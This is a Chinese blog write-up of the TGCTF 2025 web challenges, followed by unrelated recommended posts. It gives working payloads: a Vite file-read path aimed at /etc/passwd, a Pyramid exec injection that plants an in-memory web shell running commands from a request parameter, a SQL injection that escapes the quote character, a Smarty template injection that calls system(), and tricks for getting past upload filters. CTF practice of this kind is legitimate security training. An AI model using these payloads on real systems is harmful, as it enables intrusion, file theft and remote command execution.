【Web】TGCTF 2025 题解

最新推荐文章于 2025-05-31 23:01:17 发布
原创 最新推荐文章于 2025-05-31 23:01:17 发布 · 778 阅读 · 8 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#TGCTF #CTF #WEB #WP

目录

前端GAME

偷渡阴平

熟悉的配方,熟悉的味道 

后台管理

老登,炸鱼来了?

火眼辩魑魅

直面天命

(ez)upload

前端GAME

是vite框架

参考

Vite CVE-2025-30208 安全漏洞 - 日升_rs - 博客园

/@fs/etc/passwd?import&raw??

 读/proc/1/cmdline

 读start.sh

 读 /tgflagggg

偷渡阴平

绕waf

<?php


$tgctf2025=$_GET['tgctf2025'];

if(!preg_match("/0|1|[3-9]|\~|\`|\@|\#|\\$|\%|\^|\&|\*|\(|\)|\-|\=|\+|\{|\[|\]|\}|\:|\'|\"|\,|\<|\.|\>|\/|\?|\\\\|localeconv|pos|current|print|var|dump|getallheaders|get|defined|str|split|spl|autoload|extensions|eval|phpversion|floor|sqrt|tan|cosh|sinh|ceil|chr|dir|getcwd|getallheaders|end|next|prev|reset|each|pos|current|array|reverse|pop|rand|flip|flip|rand|content|echo|readfile|highlight|show|source|file|assert/i", $tgctf2025)){
    //hint:你可以对着键盘一个一个看,然后在没过滤的符号上用记号笔画一下(bushi
    eval($tgctf2025);
}
else{
    die('(╯‵□′)╯炸弹!•••*~●');
}

highlight_file(__FILE__);

 用session来绕

熟悉的配方,熟悉的味道 

经典pyramid框架,漏洞点在exec

致敬的强网杯2024

https://xz.aliyun.com/news/16090

payload:

exec("import sys;config = sys.modules['__main__'].config;app=sys.modules['__main__'].app;print(config);config.add_route('shell', '/shell');config.add_view(lambda request: Response(__import__('os').popen(request.params.get('1')).read()),route_name='shell');app = config.make_wsgi_app()")

成功打入内存马 

 

后台管理

显然有一处SQL注入,但waf掉了闭合的单引号

有点像西湖的sqli or not

【Web】2025西湖论剑·中国杭州网络安全安全技能大赛题解(全)_西湖论剑·中国杭州网络安全技能大赛 赛题-CSDN博客

对username后的引号进行转义,让username为  \' AND password = 

SELECT * FROM users WHERE username = '\' AND password = 'union select *,2 from flag--+'

老登,炸鱼来了?

 

无解的题目只能用条件竞争,竞争safe的值是否为nil

跑了一下没跑出来😓

 

火眼辩魑魅

smarty注入秒了

{if system('cat /tgf*');}{/if}

直面天命

扫出来./hint路由

访问./aazz

拿到源码

打SSTI 

 

blacklist去除'{'和'}',本地起个服务用fenjing梭一下,把{{}}换成天命难违 

(ez)upload

dirsearch扫出来一个bak

访问index.php.bak

看到upload.php

 

访问upload.php.bak看到上传文件的逻辑

 文件内容用PCRE回溯上限绕过,文件后缀用move_uploaded_file特性绕过

 参考

PHP利用PCRE回溯次数限制绕过某些安全限制 | 离别歌

move_uploaded_file绕过 | Lazzaro 

 

成功传马

 

Z3r4y
关注
2025美赛|数学建模ABCDEF题解+源代码
Talk is cheap, show me the code!
01-15 5517
1.24准时更新
BUUCTF-Web题解(持续更新中)
2301_80281749的博客
11-25 2661
查询字段1’ union select 1,2,group_concat(id,username,password) from l0ve1ysq1#,就得到了flag:flag{5366f7aa-8040-44fc-bd88-bd0cfc671f3d}cat /flag进行查看flag文件,于是得到flag:flag{d81837e0-b908-4a0a-bac0-23ff569befe1}1,于是就得到了flag:flag{fac64f95-3877-4f3e-9772-47bb8585b31a}
第一届贵州理工校赛--ez-sqli&&ez-include&&ez-include-plus
hj06112的博客
05-22 1321
过滤了许多协议,但是也有其他的协议没有过滤,比如input,此题可以用input解题,但是此黑名单过滤存在一定缺陷,因为不可能把全部过滤了,所以此过滤机制只是过滤了data://,但是并没有过滤data,为什么可以这样操作,这就涉及。ok,flag出来了,此题也可以使用input来解题,两种方法都是可行的,还是挺简单的,没有过滤,那么接下来的一题就存在过滤。关于文件包含的知识点,小伙伴觉得有用的,可以保存下来,那么此题的思路应该就是文件包含了。input协议是个可以访问请求的原始数据的只读流。
TGCTF 2025 web 个人wp
Python1111111的博客
04-15 2371
然后又因为数字偏偏只有2没有被禁,所以这里肯定是一个重要的利用点,可以想到hex2bin函数,把十六进制字符串转为二进制ascii字符串,如果我们往请求头中放入我们构造的十六进制字符串,hex2bin转为字符串后就可以执行了。首先dirsearch扫一下发现robots.txt,发现很多php文件,题目说只有一个洞是通的,又说是shell学姐,所以直接打tgshell.php,打开看到是一个一句话马。由base64_decode变成了encode并且多了不可逆的md5,所以这一种办法应该是行不通的。
iscc2024 web部分题解
2301_78871310的博客
05-27 456
人们的好比赛
2025山东CCPC题解
2402_88147924的博客
05-31 1690
山东CCPC部分题解
BUUCTF Web 题解
duwgv的博客
03-02 1399
在最下面出现了一串代码,它告诉我们,将cat == dog就给我们回显类似于flag的东西。这时想到file传入参数为flag.php,flag大概被隐藏在该文件中,试一下php伪协议。可以有文件显示,说明这大概是个Linux系统,那就来找一下,flag文件。有个$a 变量,这个可以用变量覆盖,但有的不行。进去后给我们一个这样的笑脸,也是什么都没有,同样看页面的源代码。来ping一下本机,发现可以,然后看看分号还可以用不。这个可以代表空格,但不是唯一,可以去查一下。这里可以看出,是单引号闭合。
攻防世界web新手区题解
陶的博客
09-13 3006
第一题 view_source 点击获取在线场景后等它加载完毕后点击URL进入实验环境: 查看源代码,右键不可以用。所以按F12,直接查看源码
Bugku web3 详细题解
日熙的博客
07-15 4226
题目: Bugku web3: http://123.206.87.240:8002/web3/ 1.链接打开后,显示如下页面: 点击确定又会出现下面的窗口。就这样一直会有对话框弹出,怎么管都关不掉 2.考虑这是浏览器脚本的设置因素,所以要关闭你浏览器里的脚本,在设置采用禁用即可。 但是我这个用的是火狐浏览器,上面有一个“阻止此页面创建更多对话框的” 选项,勾选即可,关闭脚本后网页就是一篇空白,查看网页源码,发现结尾处有一段注释,如下图: 3.发现这是一串Unicode编码,于是放入Unicode在线编
HNCTF——web方向部分题解
m0_60715541的博客
11-01 1841
这是这次分享的题解的清单,主要是web的,等我啥时候有时间更新一波杂项的题解
部分ctf-web题解
weixin_66669317的博客
12-06 2428
ctfweb部分题解
西普WEB大部分题解
12-09
【标题】"西普WEB大部分题解"是一个针对网络安全领域中的Web安全训练平台——西普(CTF)的解题指南。这个资源包含了对西普平台上多种Web安全挑战的解答,旨在帮助那些参与CTF(Capture The Flag)比赛或者希望提升...
第 14 届蓝桥杯国赛 Web 题解 (2023 年 6 月 10 日)
06-02
蓝桥杯国赛 国赛(大学组) 试题列表和分值 试题序号、试题名称及基础源代码文件夹名称对应如下: 01 植物灌溉(5 分) 02 萌宠小玩家(5 分) 03 element-ui 轮播图组件二次封装(10 分) 04 抢红包啦(10 分) ...
Pythoncvs批量转Excel(xlsx)工具
最新发布
08-24
友好的图形用户界面 支持批量选择和转换CSV文件 支持两种Excel格式:.xlsx(Excel 2007+)和.xls(Excel 97-2003) 可自定义输出目录 多种转换选项: 保持原文件名结构 覆盖已存在文件的选项 实时进度显示 错误处理和详细的转换报告 文件选择区域 添加CSV文件:选择一个或多个CSV文件 清空列表:清除所有已选择的文件 删除选中:删除列表中选中的文件 输出设置 输出目录:选择转换后文件的保存位置 输出格式: Excel 2007+ (.xlsx):推荐格式,支持更大的数据量 Excel 97-2003 (.xls):兼容老版本Excel 转换选项 保持原文件名结构:使用原CSV文件名作为输出文件名 覆盖已存在的文件:如果输出文件已存在,是否覆盖
qelectrotech-0.90-1.el8.tar.gz
08-24
# 适用操作系统:Centos8 #Step1、解压 tar -zxvf xxx.el8.tar.gz #Step2、进入解压后的目录,执行安装 sudo rpm -ivh *.rpm
qrupdate-devel-1.1.2-18.el8.tar.gz
08-24
# 适用操作系统:Centos8 #Step1、解压 tar -zxvf xxx.el8.tar.gz #Step2、进入解压后的目录,执行安装 sudo rpm -ivh *.rpm
基于go-micro、oauth2.0、gin的微服务授权中心.zip
08-24
基于go-micro、oauth2.0、gin的微服务授权中心.zip
基于Matlab Simulink的十四自由度整车模型模块化建模与实时数据分析 精选版
08-24
内容概要:本文介绍了基于Matlab/Simulink构建的十四自由度整车模型及其应用场景。该模型采用了模块化建模方法,涵盖了转向系统、整车系统、悬架系统、魔术轮胎、车轮系统以及PI驾驶员控制模块等多个关键组件。每个自由度的数据都可以在Simulink中实现实时监控和调整。文中详细描述了各个模块的功能和实现方式,如转向系统的阿克曼几何关系、魔术轮胎的Pacejka 96模型、悬架系统的弹簧阻尼子系统等。此外,还提供了具体的调试技巧和优化建议,帮助用户更好地理解和应用这一复杂模型。 适用人群:汽车工程领域的研究人员和技术人员,尤其是对车辆动力学建模感兴趣的从业者。 使用场景及目标:①用于模拟不同工况下的车辆动态行为;②为车辆控制系统的设计提供理论依据;③辅助进行车辆性能测试和改进。 其他说明:附带详细的建模说明文档、参考资料及相关文献,便于用户深入学习和实践。
基于Go的本地内存缓存.zip
08-24
基于Go的本地内存缓存.zip
ctfshow web34题解
04-03
### CTFShow Web 第34题 解题思路 #### 背景分析 CTFShow 平台中的 Web 类别题目通常涉及漏洞利用、代码审计以及安全防护机制绕过等内容。对于第34题,可以从已知的参考资料中提取关键信息并结合常见 Web 安全挑战...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值